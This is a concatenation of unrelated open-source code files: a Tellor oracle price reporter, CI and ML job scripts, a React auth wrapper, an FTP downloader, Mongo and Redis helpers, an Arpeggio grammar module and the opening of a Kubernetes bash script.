        self.acc = self.w3.eth.account.from_key(config["private_key"])
        # TellorX playground contract address on Rinkeby.
        self.playground = self.w3.eth.contract(
            "0x4699845F22CA2705449CFD532060e04abE3F1F31", abi=tellor_playground_abi
        )

    def tobytes32(self, request_id: str) -> bytes:
        """Casts request_id as bytes32.

        NOTE(review): this actually returns len(request_id) ASCII bytes, not a
        zero-padded 32-byte value, and callers pass a '0x'-prefixed hex string
        -- confirm the contract ABI accepts this encoding.
        """
        return bytes(request_id, "ascii")

    def tobytes(self, value: int) -> Any:
        """Casts value as a bytes array (via the hex text representation)."""
        return Web3.toBytes(hexstr=Web3.toHex(text=str(value)))

    def build_tx(self, value: float, request_id: str, gas_price: str) -> Any:
        """Assembles needed transaction data.

        `value` is scaled by 1e6 before encoding; `gas_price` is in gwei.
        """
        request_id_bytes = self.tobytes32(request_id)
        value_bytes = self.tobytes(int(value * 1e6))
        # Oracle-side nonce: number of values already reported for this id.
        nonce = self.playground.functions.getNewValueCountbyRequestId(
            request_id_bytes
        ).call()
        print("nonce:", nonce)
        # Account nonce for the raw transaction itself.
        acc_nonce = self.w3.eth.get_transaction_count(self.acc.address)
        transaction = self.playground.functions.submitValue(
            request_id_bytes, value_bytes, nonce
        )
        estimated_gas = transaction.estimateGas()
        print("estimated gas:", estimated_gas)
        built_tx = transaction.buildTransaction(
            {
                "nonce": acc_nonce,
                "gas": estimated_gas,
                "gasPrice": self.w3.toWei(gas_price, "gwei"),
                "chainId": 4,  # rinkeby
            }
        )
        return built_tx

    def submit_data(self, value: float, request_id: str) -> Any:
        """Submits data on-chain & provides a link to view the
        successful transaction.

        Fetches the current "fast" gas price from ethgasstation, signs the
        transaction locally, and blocks (up to 360 s) waiting for the receipt.
        """
        req = requests.get("https://ethgasstation.info/json/ethgasAPI.json")
        prices = json.loads(req.content)
        gas_price = str(prices["fast"])
        print("retrieved gas price:", gas_price)
        tx = self.build_tx(value, request_id, gas_price)
        tx_signed = self.acc.sign_transaction(tx)
        tx_hash = self.w3.eth.send_raw_transaction(tx_signed.rawTransaction)
        _ = self.w3.eth.wait_for_transaction_receipt(tx_hash, timeout=360)
        print(f"View reported data: https://rinkeby.etherscan.io/tx/{tx_hash.hex()}")
class IntervalReporter(Reporter):
    """Submits the price of BTC to the TellorX playground
    every 10 seconds."""

    def __init__(self, datafeeds: Mapping[str, DataFeed], datafeed_uid: str) -> None:
        # All available feeds, plus the uid of the single feed this reporter
        # is responsible for updating.
        self.datafeeds = datafeeds
        self.datafeed_uid = datafeed_uid
        # NOTE(review): temp_config holds empty node_url/private_key
        # placeholders -- real credentials must be wired in before this
        # submitter can actually work (see TODO above temp_config).
        self.submitter = RinkebySubmitter(temp_config)

    async def report(self) -> None:
        """Update all off-chain values (BTC/USD), store those values locally,
        and submit the latest BTC/USD values to the Tellor oracle -- forever,
        once every 10 seconds."""
        while True:
            # Refresh only the feed this reporter was configured for.
            jobs = []
            for datafeed in self.datafeeds.values():
                if datafeed.uid == self.datafeed_uid:
                    job = asyncio.create_task(datafeed.update_value(store=True))
                    jobs.append(job)
            _ = await asyncio.gather(*jobs)
            for uid, datafeed in self.datafeeds.items():
                if datafeed.value:
                    print(f"Submitting value for {uid}: {datafeed.value.val}")
                    q = datafeed.get_query()
                    if q is not None:
                        """TODO:
                        - Should encode value using query response type.
                        - Also use request ID encoded by query
                        - Decide if these goes here or in submitter.
                        """
                        # TODO: Should use query to encode value. Request ID
                        # from query is already in bytes. Probably
                        # be part of submitter
                        encoded_value = q.response_type.encode(datafeed.value.val)
                        print(encoded_value)  # Dummy print to pass tox style
                        request_id_str = "0x" + q.request_id.hex()
                        self.submitter.submit_data(datafeed.value.val, request_id_str)
                else:
                    print(f"Skipping submission for {uid}, datafeed value not updated")
            await asyncio.sleep(10)

    def run(self) -> None:  # type: ignore
        """Used by telliot CLI to update & submit BTC/USD price data to Tellor Oracle."""
        # Create coroutines to run concurrently.
        loop = asyncio.get_event_loop()
        _ = loop.create_task(self.report())
        # Blocking loop.
        try:
            loop.run_forever()
        except (KeyboardInterrupt, SystemExit):
            loop.close()
|
#!/usr/bin/env bash
# This script is executed inside the builder image
set -e
source ./ci/matrix.sh
if [ "$RUN_TESTS" != "true" ]; then
  echo "Skipping unit tests"
  exit 0
fi
# TODO this is not Travis agnostic
# Randomize boost test ordering per CI build (seed derived from the build id).
export BOOST_TEST_RANDOM=1$TRAVIS_BUILD_ID
export LD_LIBRARY_PATH=$BUILD_DIR/depends/$HOST/lib
export WINEDEBUG=fixme-all
export BOOST_TEST_LOG_LEVEL=test_suite
cd build-ci/alterdot-$BUILD_TARGET
if [ "$DIRECT_WINE_EXEC_TESTS" = "true" ]; then
  # Inside Docker, binfmt isn't working so we can't trust in make invoking windows binaries correctly
  wine ./src/test/test_alterdot.exe
else
  make $MAKEJOBS check VERBOSE=1
fi
|
# coding=utf-8
# Copyright 2019 The Google NoisyStudent Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/bin/bash
# Run teacher-model prediction on the unlabeled SVHN "extra" split, one shard
# at a time, producing pseudo-labels for NoisyStudent training.
data_root=./data/svhn/predict/
info_dir=${data_root}/info
data_dir=./data/svhn/proc/unlabeled  # NOTE(review): not referenced below -- confirm before removing
prediction_dir=${data_root}/predict_label
# Prediction jobs for different shards can run in parallel if you have multiple GPUs/TPUs
for shard_id in {0..127}
do
  python main.py \
    --model_name=efficientnet-b0 \
    --use_tpu=False \
    --use_bfloat16=False \
    --task_name=svhn \
    --mode=predict \
    --predict_ckpt_path=ckpt/teacher_ckpt/model.ckpt \
    --worker_id=0 \
    --num_shards=128 \
    --shard_id=${shard_id} \
    --file_prefix=extra \
    --label_data_dir=${data_root} \
    --data_type=tfrecord \
    --info_dir=${info_dir} \
    --output_dir=${prediction_dir}
done
|
# This shell script executes Slurm jobs for thresholding
# predictions of NTT-like convolutional
# neural network on BirdVox-70k full audio
# with logmelspec input.
# Augmentation kind: all-but-noise.
# Test unit: unit01.
# Trial ID: 2.
# One job per prediction unit (unit01/unit07/unit10); the parameters above are
# encoded in the sbatch file names.
sbatch 042_aug-all-but-noise_test-unit01_predict-unit01_trial-2.sbatch
sbatch 042_aug-all-but-noise_test-unit01_predict-unit07_trial-2.sbatch
sbatch 042_aug-all-but-noise_test-unit01_predict-unit10_trial-2.sbatch
|
#!/bin/sh
# (Re)create the alpine-www container serving $WWW_ROOT from the host.
DOCKER_IMG="alpine-www:v1.0"
CONTAINER_ID="alpine-www"
WWW_ROOT="dev.51zyy.cn"
echo "==> 1. Create new container: $CONTAINER_ID"
# Map host 80/443 onto the container's unprivileged 8080/8443 listeners and
# bind-mount the site content.
docker run -d -p 80:8080 -p 443:8443 --name $CONTAINER_ID --restart always \
  -v /www_data/www/$WWW_ROOT:/var/www/html \
  $DOCKER_IMG
#echo "==> 2. Customize nginx configure"
#docker cp config/custom.conf $CONTAINER_ID:/etc/nginx/conf.d/
#echo "==> 3. Container $CONTAINER_ID restart"
#docker container restart $CONTAINER_ID
sleep 3
echo "==> Restart OK!"
<reponame>meanwise-eng/brands-client
import React, { Component, PropTypes } from 'react';
import { connect } from 'react-redux';
import { browserHistory } from 'react-router';
// Higher-order component: wraps `ComposedComponent` and redirects to '/'
// whenever the redux store says the user is not authenticated.
export default function(ComposedComponent) {
  class Authentication extends Component {
    // NOTE(review): componentWillMount/componentWillUpdate are legacy React
    // lifecycles (deprecated since 16.3) -- consider componentDidMount /
    // componentDidUpdate when this is next touched.
    componentWillMount() {
      // Not authenticated on first render: bounce to the landing page.
      if(!this.props.authenticated) {
        browserHistory.push('/');
      }
    }
    componentWillUpdate(nextProps) {
      // Also bounce if authentication is lost while mounted.
      if(!nextProps.authenticated) {
        browserHistory.push('/');
      }
    }
    render() {
      return <ComposedComponent {...this.props} />;
    }
  }
  // NOTE(review): declared as a required object, but the guards above treat it
  // as a truthy flag -- confirm what state.authenticate actually holds.
  Authentication.propTypes = {
    authenticated: PropTypes.object.isRequired
  };
  const mapStateToProps = (state) => {
    return {authenticated: state.authenticate};
  };
  return connect(mapStateToProps)(Authentication);
}
|
def solve_sudoku(board):
    """Fill `board` in place by backtracking; return True when solved.

    Relies on the module-level helpers `find_empty_location` (falsy when the
    board is full, otherwise a (row, col) pair) and `valid_move`.
    """
    slot = find_empty_location(board)
    if not slot:
        # No empty cell left: the board is complete.
        return True
    row, col = slot
    for candidate in range(1, 10):
        if not valid_move(board, candidate, (row, col)):
            continue
        board[row][col] = candidate
        if solve_sudoku(board):
            return True
        # Dead end: undo the tentative placement and try the next digit.
        board[row][col] = 0
    return False
# Execute tests
# $1: path to the CI workspace containing the IM checkout.
WORKSPACE=$1
cd $WORKSPACE
# Run the integration suites with JUnit XML, per-test timing and coverage output.
nosetests-2.7 test/integration/TestREST_JSON.py test/integration/TestREST.py test/integration/TestIM.py -v --stop --with-xunit --with-timer --timer-no-color --with-coverage --cover-erase --cover-xml --cover-package=IM
|
package com.simple.download.ftp;
import com.simple.download.DLThread;
import com.simple.download.base.DLLog;
import org.apache.commons.net.ftp.FTP;
import org.apache.commons.net.ftp.FTPClient;
import org.apache.commons.net.ftp.FTPReply;
import java.io.BufferedInputStream;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.RandomAccessFile;
/**
 * Created by e2670 on 2017/9/10.
 * FtpDLThread - performs the download task of one independent thread.
 */
public class FtpDLThread extends DLThread {

    private FtpLogin ftpLogin;

    /**
     * @param ftpLogin   FTP connection / login parameters
     * @param file       destination file on disk
     * @param blockSize  number of bytes each thread is responsible for
     * @param loadedSize bytes this thread has already downloaded (resume offset)
     * @param threadId   1-based thread id; determines this thread's byte range
     */
    public FtpDLThread(FtpLogin ftpLogin, File file, long blockSize, long loadedSize, int threadId) {
        super(null, file, blockSize, loadedSize, threadId);
        this.ftpLogin = ftpLogin;
    }

    @Override
    public void run() {
        BufferedInputStream bis = null;
        RandomAccessFile raf = null;
        // Declared outside try so the control connection can be released in
        // finally; previously it was only disconnected on the error path,
        // leaking the connection on success, cancel and exception.
        FTPClient client = new FTPClient();
        try {
            client.connect(ftpLogin.ipAddr, ftpLogin.port);
            if (ftpLogin.userName != null) {
                client.login(ftpLogin.userName, ftpLogin.password);
            }
            client.enterLocalPassiveMode();           // passive mode
            client.setFileType(FTP.BINARY_FILE_TYPE); // binary transfer mode
            long startPos = blockSize * (threadId - 1) + loadSize; // first byte of this thread's range
            long endPos = blockSize * threadId - 1;                // last byte of this thread's range
            client.setRestartOffset(startPos);        // resume position
            DLLog.d(Thread.currentThread().getName() + " bytes=" + startPos + "-" + endPos);
            // Prefer UTF-8 for the remote path when the server supports it,
            // otherwise fall back to GBK.
            String charSet = "UTF-8";
            if (!FTPReply.isPositiveCompletion(client.sendCommand("OPTS UTF8", "ON"))) {
                charSet = "GBK";
            }
            client.allocate(cacheSize);
            InputStream is = client.retrieveFileStream(new String(ftpLogin.path.getBytes(charSet), "ISO-8859-1"));
            int reply = client.getReplyCode();
            if (!FTPReply.isPositivePreliminary(reply)) {
                DLLog.e("获取文件信息错误,错误码为:" + reply, null);
                return;
            }
            byte[] buffer = new byte[cacheSize];
            bis = new BufferedInputStream(is);
            raf = new RandomAccessFile(file, "rwd");
            raf.seek(startPos);
            int len;
            while ((len = bis.read(buffer, 0, cacheSize)) != -1 && !isCancel) {
                raf.write(buffer, 0, len);
                downloadLength += len;
                // NOTE(review): this stops after (endPos - startPos) bytes --
                // one short of the inclusive range -- and a full buffer may
                // overshoot endPos; the surrounding blockSize math presumably
                // compensates. Confirm before changing.
                if (downloadLength >= endPos - startPos) {
                    break;
                }
            }
            isCompleted = true;
            DLLog.d(TAG, "current thread task has finished,all size:" + downloadLength);
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            if (bis != null) {
                try {
                    bis.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (raf != null) {
                try {
                    raf.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            // Fix: always release the FTP control connection.
            if (client.isConnected()) {
                try {
                    client.disconnect();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    }
}
|
const config = require('./../../config/index');
var redis = require('redis');
var client = redis.createClient({
host: config.redis.server,
port: config.redis.port,
password: config.redis.password,
});
exports.setObject = function (key, object) {
// 进入前需要先序列化
client.set(key, JSON.stringify(object));
};
exports.getObject = function (key) {
return new Promise((resolve, reject) => {
client.get(key, function (err, obj) {
if (err) {
reject(err);
}
// 取出前需要反序列化
resolve(JSON.parse(obj));
});
});
}; |
var mongoDB = require('../../config/mongoose.conf');
var baseDeDatos = mongoDB();
var usuarioModel = require('../models/usuario.server.model');
var request = require('request');
exports.getUsuarios = function (req, res) {
console.log("---------------------------------------");
console.log("******Devolver todos los usuarios******");
usuarioModel.find({}, function (err, users) {
if(err)
res.status(500).send({status:'Error al recuperar los usuarios',code:500});
if(users.length>0) {
var userMap = [];
users.forEach(function (user) {
userMap.push( user);
});
res.status(200).send({data: userMap, code:200,status:'Recuperados los usuarios'});
}else{
res.status(404).send({status:'No se han encontrado usuarios en la familia',code:404});
}
});
};
exports.getUsuario = function (req, res) {
console.log("----------------------------");
console.log("******Devolver usuario******");
console.log("Devolviendo usuario con uid:" + req.params.id);
usuarioModel.findOne({_id: req.params.id}, function (err, user) {
if(err)
res.status(500).send({status:'Error al recuperar el usuario',code:500});
if (user) {
res.status(200).send({Usuario: user,status:'Recuperado el usuario correctamente',code:200});
} else {
res.status(404).send({status: "No se ha encontrado el usuario con el uid:" + req.params.id,code:404});
}
});
};
exports.addUser = function (req, res) {
console.log("----------------------------");
console.log("******Actualizar usuario******");
console.log("Añadimos usuario...");
console.log(req.body);
console.log("Creamos el modelo");
var usuario = new usuarioModel({
nombre: req.body.nombre,
apellidos: req.body.apellidos,
email: req.body.email,
direccion : req.body.email
}
);
usuarioModel.findOne({ email: req.body.email }, function (err, user) {
if (user) {
res.status(403).send({error: "El email ya está en uso.", code: 403});
} else {
console.log("Guardamos en la db...");
usuario.save(function(err){
if(err)
console.log(err);
else{
console.log("Guardado en la db.");
res.status(201).send({data:usuario,status:"Añadido el usaurio con éxito",code:201});
}
});
}
});
};
exports.delUser = function (req, res) {
console.log("----------------------------");
console.log("******Eliminar usuario******");
console.log("Vamos a eliminar el usuario con el id: " + req.params.id);
usuarioModel.findOne({ _id: req.params.id }, function (err, user) {
if(err)
res.status(500).send({status:'Error al buscar el usuario para eliminarlo',code:500});
if(user) {
user.remove();
res.status(200).send({status: "Usuario eliminado con éxito",code:200});
}else{
res.status(404).send({status: "No se encontró el usuario",code:404});
}
});
};
exports.updateUser = function (req, res) {
console.log("-------------------------------");
console.log("******Actualizar usuario******");
console.log("El uid a actualizar es:"+ req.params.id);
usuarioModel.findOneAndUpdate({_id: req.params.id}, {
nombre: req.body.nombre,
apellidos: req.body.apellidos,
email: req.body.email,
direccion: req.body.direccion,
}, function (err, user) {
if (err)
cres.status(500).send({status: "Error al buscar y editar el usuario", code: 500});
if (user) {
console.log("USUARIO ACTUALIZADO CON ÉXITO");
console.log(user);
res.status(204).send({status: "Editado con éxito", code: 204});
}
else
res.status(404).send({status: "No se ha encontrado el usuario a modificiar con id: "+ req.params.id, code: 404});
});
}
|
/*
* Access API
*
* No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
*
* API version: 1.0.0
* Generated by: Swagger Codegen (https://github.com/swagger-api/swagger-codegen.git)
*/
package swagger
import (
"time"
)
type BlockEvents struct {
BlockId string `json:"block_id,omitempty"`
BlockHeight string `json:"block_height,omitempty"`
BlockTimestamp time.Time `json:"block_timestamp,omitempty"`
Events []Event `json:"events,omitempty"`
Links *Links `json:"_links,omitempty"`
}
|
import sys
from keyword import iskeyword
from dataclasses import dataclass
from arpeggio import ParsingExpression, EOF, RegExMatch as _ , StrMatch
from arpeggio import ParseTreeNode, Terminal
#------------------------------------------------------------------------------
# Names this module exports; single-character constants and their generated
# rules/terminals are appended dynamically while CHARACTER_TABLE is processed.
ALL = ( # single character constants and rules are added dynamically
    #
    # rules
    ' whitespace '   # single whitespace character
    ' newline '      # newline, optionally preceded by whitespace
    ' blank_line '   # two newlines, intervening whitespace ok
    ' ws t_ws p_ws'  # one or more whitespace characters
    ' wx t_wx p_wx'  # zero or more whitespace characters (fixed: was a copy-paste of t_ws/p_ws)
    ' valid_wx t_wx_newline p_wx_newline '
    ' valid_ws t_ws_newline p_ws_newline '
).split()
#------------------------------------------------------------------------------
@dataclass
class character (object):
    # One row of CHARACTER_TABLE describing a single-character constant.
    name    : str           # Must be an all-uppercase valid identifier
    raw     : str           # i.e. r'\n' is two characters, not one
    alias   : str = None    # optional alternate all-uppercase name
    ch      : str = None    # the actual one-character string (filled in at load time)
    name_lc : str = None    # lowercase form of name (filled in at load time)
    rule    : object = None # grammar rule, populated dynamically
    rule_m  : object = None # StrMatch-based rule, populated dynamically
#------------------------------------------------------------------------------
# https://donsnotes.com/tech/charsets/ascii.html
# Table of the characters this grammar knows about.  Comments give the
# decimal and hex ASCII codes (corrected: '=' is 0x3d and ']' is 93).
_c = character
CHARACTER_TABLE = [
    _c( 'TAB',       r'\t' ),                       #   9 0x09
    _c( 'LF',        r'\n' , 'LINEFEED' ),          #  10 0x0a
    _c( 'CR',        r'\r' , 'CARRIAGE_RETURN' ),   #  13 0x0d
    _c( 'SPACE',     r' ' ),                        #  32 0x20
    _c( 'L_PAREN',   r'(' ),                        #  40 0x28
    _c( 'R_PAREN',   r')' ),                        #  41 0x29
    _c( 'COMMA',     r',' ),                        #  44 0x2c
    _c( 'EQ',        r'=' , 'EQUALS' ),             #  61 0x3d
    _c( 'L_BRACKET', r'[' ),                        #  91 0x5b
    _c( 'R_BRACKET', r']' ),                        #  93 0x5d
    _c( 'BAR',       r'|' ),                        # 124 0x7c
]
del _c
#------------------------------------------------------------------------------
@dataclass
class ParseSpec (object):
    # Bundle of a text sample, the rule expected to parse it, and the
    # parse-tree node the parse should produce (used by the test suite).
    text   : str
    rule   : ParsingExpression
    expect : ParseTreeNode
#------------------------------------------------------------------------------
def create_character_rules_and_terminals ( c ):
    """For character *c*, dynamically generate a plain rule, a StrMatch
    rule, a Terminal and a ParseSpec, registering each in the module
    globals, in the CHARACTER_* registries and in ALL.  Aliases receive
    extra bindings to the same objects.  exec() is used so the generated
    functions carry the character's own name.
    """
    c.name_lc = c.name.lower()
    code = f"""
def {c.name_lc} ():
    return {c.name}
CHARACTER_RULES.append({c.name_lc})
ALL.append({c.name_lc})
def {c.name_lc}_m ():
    return StrMatch({c.name}, rule_name='{c.name_lc}')
CHARACTER_MRULES.append({c.name_lc}_m)
ALL.append({c.name_lc}_m)
t_{c.name_lc} = Terminal({c.name_lc}_m(), 0, {c.name})
CHARACTER_TERMINALS.append(t_{c.name_lc})
ALL.append(t_{c.name_lc})
p_{c.name_lc} = ParseSpec( {c.name}, {c.name_lc}_m, t_{c.name_lc} )
ALL.append(p_{c.name_lc})
"""
    # Tabs are stripped so the generated source is flush-left for exec().
    exec(code.replace('\t',''), globals())
    if c.alias is not None and len(c.alias) > 0:
        c.alias_lc = c.alias.lower()
        code = f"""
{c.alias_lc} = {c.name_lc}
ALL.append({c.alias_lc})
{c.alias_lc}_m = {c.name_lc}_m
ALL.append({c.alias_lc}_m)
t_{c.alias_lc} = t_{c.name_lc}
ALL.append(t_{c.alias_lc})
p_{c.alias_lc} = p_{c.name_lc}
ALL.append(p_{c.alias_lc})
"""
        exec(code.replace('\t',''), globals())
#------------------------------------------------------------------------------
def validate_name(which, name, raw):
    """Assert that *name* (the *which* -- 'name' or 'alias' -- chosen for
    raw spelling *raw*) is a unique, all-uppercase, non-keyword Python
    identifier.  Raises AssertionError describing the configuration error.
    """
    p = "PACKAGE CONFIGURATION ERROR, "
    assert not iskeyword(name), \
        ( f"{p}Invalid character {which} '{name}' for '{raw}', {which} "
          f"may not be a Python keyword." )
    assert name.isidentifier(), \
        ( f"{p}Invalid character {which} '{name}' for '{raw}', {which} "
          f"is not a valid Python identifier." )
    assert name == name.upper(), \
        ( f"{p}Character {which} '{name}' is not all uppercase. Character "
          f"name and alias constants must be all uppercase. Lowercase "
          f"reserved for their corresponding grammar rules.")
    # Uniqueness check across both names and aliases registered so far.
    assert name not in CHARACTER_NAME_TO_CHAR, \
        ( f"{p}Character {which} '{name}' for '{raw}', already exists. Prior "
          f"occurance for '{CHARACTER_NAME_TO_CHAR[name]}'")
#------------------------------------------------------------------------------
module = sys.modules[__name__]
# Lookup tables keyed by the actual character, its raw (escaped) spelling,
# or its uppercase name/alias.
CHARACTER_CHAR_TO_NAME  = { }
CHARACTER_CHAR_TO_ALIAS = { }
CHARACTER_NAME_TO_CHAR  = { }
CHARACTER_CHAR_TO_RAW   = { }
CHARACTER_RAW_TO_CHAR   = { }
# Arrays in order of occurance in CHARACTER_TABLE, no extra elements for aliases.
CHARACTER_CHARS     = [ ]
CHARACTER_RAW       = [ ]
CHARACTER_RULES     = [ ]
CHARACTER_MRULES    = [ ]
CHARACTER_TERMINALS = [ ]
for c in CHARACTER_TABLE :
    validate_name('name', c.name, c.raw)
    # eval turns the raw escaped spelling (e.g. r'\n') into the real character.
    c.ch = eval(f"'{c.raw}'")
    CHARACTER_CHARS.append(c.ch)
    CHARACTER_RAW.append(c.raw)
    CHARACTER_CHAR_TO_NAME[c.ch] = c.name
    CHARACTER_NAME_TO_CHAR[c.name] = c.ch
    CHARACTER_RAW_TO_CHAR[c.raw] = c.ch
    CHARACTER_CHAR_TO_RAW[c.ch] = c.raw
    # Publish the uppercase name as a module-level constant, e.g. LF = '\n'.
    setattr ( module, c.name, c.ch )
    ALL.append(c.name)
    if c.alias is not None :
        validate_name('alias', c.alias, c.raw)
        CHARACTER_NAME_TO_CHAR[c.alias] = c.ch
        CHARACTER_CHAR_TO_ALIAS[c.ch] = c.alias
        setattr ( module, c.alias, c.ch )
        ALL.append(c.alias)
    create_character_rules_and_terminals ( c )
del module
#------------------------------------------------------------------------------
# WHITESPACE_CHARS = ( TAB , CR , SPACE )
# Note: whitespace here deliberately excludes LF, which is handled by the
# newline/blank_line rules below.
WHITESPACE_CHARS = TAB + CR + SPACE
WHITESPACE_RAW = tuple( [ CHARACTER_CHAR_TO_RAW[ch] for ch in WHITESPACE_CHARS ] )
WHITESPACE_RAW_STR = ''.join(WHITESPACE_RAW)
WHITESPACE_RULES = ( tab , cr , space )
WHITESPACE_NAMES = { ch : CHARACTER_CHAR_TO_NAME[ch] for ch in WHITESPACE_CHARS }
# WHITESPACE_REGEX = r'[\t\r ]'
WHITESPACE_REGEX = f"[{WHITESPACE_RAW_STR}]"
def whitespace():
    """One whitespace character of tab (9), carriage return (13), space (32)"""
    return _(WHITESPACE_REGEX, rule_name='whitespace', skipws=False )
WS_REGEX = WHITESPACE_REGEX + '+'
def ws():
    """One or more whitespace characters"""
    return _(WS_REGEX, rule_name='ws', skipws=False )
WX_REGEX = WHITESPACE_REGEX + '*'
def wx():
    """Zero or more whitespace characters (often '_' in PEG)"""
    return _(WX_REGEX, rule_name='wx', skipws=False )
NEWLINE_REGEX = WX_REGEX + r'\n'
def newline():
    """Newline with optional preceding whitespace"""
    return _(NEWLINE_REGEX, rule_name='newline', skipws=False)
# Lookbehind anchors the match right after a previous newline.
BLANK_LINE_REGEX = r'(?<=\n)' + NEWLINE_REGEX
def blank_line():
    """Two newlines with optional whitespace in between"""
    return _(BLANK_LINE_REGEX, rule_name='blank_line', skipws=False)
#------------------------------------------------------------------------------
# Canonical Terminal / ParseSpec instances for a bare newline and for EOF.
t_newline = Terminal(newline(), 0, '\n')
p_newline = ParseSpec ( LINEFEED, newline, t_newline )
t_eof = Terminal(EOF(), 0, '')
p_eof = ParseSpec ( '', EOF, t_eof )
#------------------------------------------------------------------------------
def linefeed_eol_only ( text ) :
    """Require exactly one linefeed in *text*, positioned at the very end.

    Raises ValueError when there are no linefeeds, more than one, or the
    single linefeed is not the last character.
    """
    n_linefeeds = text.count(LINEFEED)
    # print(f"\n: n_linefeeds = {n_linefeeds}")
    if n_linefeeds <= 0 :
        raise ValueError("No linefeeds in <text>, one is required "
            "at the end. Please address.")
    if n_linefeeds > 1 :
        raise ValueError(f"Found {n_linefeeds} linefeeds in <text>, only one "
            "allowed, at the end. Please address.")
    # Exactly one linefeed at this point, so it must be the final character.
    # (The original guarded this raise with a redundant `n_linefeeds > 0`
    # check that could never be false here.)
    if text[-1] != LINEFEED :
        raise ValueError("Linefeed not at end of specified <text>. "
            "Please address." )
#------------------------------------------------------------------------------
def ensure_linefeed_eol ( text ) :
    """Return *text* guaranteed to end with a single trailing linefeed.

    None or the empty string becomes a bare linefeed; a missing trailing
    linefeed is appended.  Final validation delegates to linefeed_eol_only().
    """
    result = LINEFEED if text is None or text == '' else text
    if not result.endswith(LINEFEED) :
        result = result + LINEFEED
    linefeed_eol_only(result)
    return result
#------------------------------------------------------------------------------
def valid_wx ( text ) :
    """Validate that every character of *text* is a configured whitespace
    character; raise ValueError otherwise.  An empty string is valid,
    since 'wx' means zero or more whitespace characters.
    """
    for ch in text :
        if ch not in WHITESPACE_CHARS :
            # Fixed: the second line was missing its f-prefix, so
            # '{WHITESPACE_NAMES}' appeared literally in the message.
            raise ValueError(
                f"In specified <text> '{text}', ch '{ch}' is not a configured "
                f"whitespace character ({WHITESPACE_NAMES}). Please address." )
#------------------------------------------------------------------------------
def valid_ws ( text ) :
    """Validate that *text* contains at least one configured whitespace
    character and nothing else; raise ValueError otherwise."""
    missing = ( "<text> has no whitespace characters. 'ws' requires "
        "at least one. Please address or use t_wx_newline." )
    if text is None or text in ( '', LINEFEED ) :
        raise ValueError(missing)
    # At least one configured whitespace char present?  Then defer the
    # character-by-character validation to valid_wx().
    if any( ch in text for ch in WHITESPACE_CHARS ) :
        return valid_wx(text)
    raise ValueError(missing)
#------------------------------------------------------------------------------
def t_wx_newline ( text = None ):
    """Return an arpeggio.Terminal for newline carrying the specified
    leading whitespace followed by a linefeed.
    If ending linefeed is missing, it will be appended.
    <text> : zero or more whitespace characters, optionally followed by a
             linefeed.  May not contain more than one linefeed.  If present,
             the linefeed must be last.
    NOTE(review): the original docstring claimed this "simply returns
    t_newline if no whitespace specified" -- the code always builds a
    fresh Terminal; confirm which behavior is intended.
    """
    text = ensure_linefeed_eol(text)
    # Everything before the trailing linefeed must be whitespace.
    valid_wx ( text[:-1] )
    return Terminal( newline(), 0, text )
def p_wx_newline ( text ) :
    # Pair the normalized text with the newline rule and its Terminal.
    t = t_wx_newline(text)
    return ParseSpec ( t.value, newline, t )
#------------------------------------------------------------------------------
def t_ws_newline ( text ):
    """Return an arpeggio.Terminal for newline with the specified whitespace
    followed by a linefeed.  If linefeed is missing, it will be appended.
    <text> : One or more whitespace characters, optionally followed by a
             linefeed.  May not contain more than one linefeed.  If present,
             the linefeed must be last.
    """
    text = ensure_linefeed_eol(text)
    # Unlike t_wx_newline, at least one whitespace character is required.
    valid_ws ( text[:-1] )
    return Terminal( newline(), 0, text )
def p_ws_newline ( text ) :
    # Pair the normalized text with the newline rule and its Terminal.
    t = t_ws_newline(text)
    return ParseSpec ( t.value, newline, t )
#------------------------------------------------------------------------------
def t_wx ( text ) :
    """Return an arpeggio.Terminal for the 'wx' rule (zero or more
    whitespace characters) holding exactly the specified whitespace.
    (Docstring fixed: the original was copy-pasted from t_wx_newline and
    described newline behavior that does not apply here.)
    <text> : zero or more whitespace characters; no linefeed allowed.
    """
    valid_wx(text)
    return Terminal( wx(), 0, text )
def p_wx ( text ) :
    # Fixed: previously built the spec from the 'ws' rule and t_ws(),
    # which requires at least one whitespace character and mismatched
    # the 'wx' (zero or more) rule this helper is named for.
    return ParseSpec ( text, wx, t_wx(text) )
#------------------------------------------------------------------------------
def t_ws ( text ) :
    """Return an arpeggio.Terminal for the 'ws' rule (one or more
    whitespace characters) holding exactly the specified whitespace.
    (Docstring fixed: the original was copy-pasted from the newline
    helpers and described behavior that does not apply here.)
    <text> : one or more whitespace characters; no linefeed allowed.
    """
    valid_ws(text)
    return Terminal( ws(), 0, text )
def p_ws ( text ) :
    # Pair the text with the 'ws' rule and its Terminal.
    return ParseSpec ( text, ws, t_ws(text) )
#------------------------------------------------------------------------------
|
#!/usr/bin/env bash
# vim:ts=4:sts=4:sw=4:et
#
# Author: Hari Sekhon
# Date: 2021-04-16 16:14:04 +0100 (Fri, 16 Apr 2021)
#
# https://github.com/HariSekhon/DevOps-Bash-tools
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn and optionally send me feedback to help steer this or other code I publish
#
# https://www.linkedin.com/in/HariSekhon
#
set -euo pipefail
[ -n "${DEBUG:-}" ] && set -x
srcdir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

# shellcheck disable=SC1090
. "$srcdir/lib/utils.sh"

# shellcheck disable=SC2034,SC2154
usage_description="
List important Kubernetes pods with their nodes to check on if they are obeying the scheduling requirements you want
"

# used by usage() in lib/utils.sh
# shellcheck disable=SC2034
usage_args=""

help_usage "$@"

# One regex fragment per line; the trailing fragment matches StatefulSet-style
# pods ending in "-<digits>".
important_pods_regex="
kube-dns
ingress-nginx
nginx-ingress
cert-manager
jenkins
teamcity
-[[:digit:]]+$
"
# Join the non-blank fragments into a single ERE alternation and drop the
# trailing '|' left by the final newline.
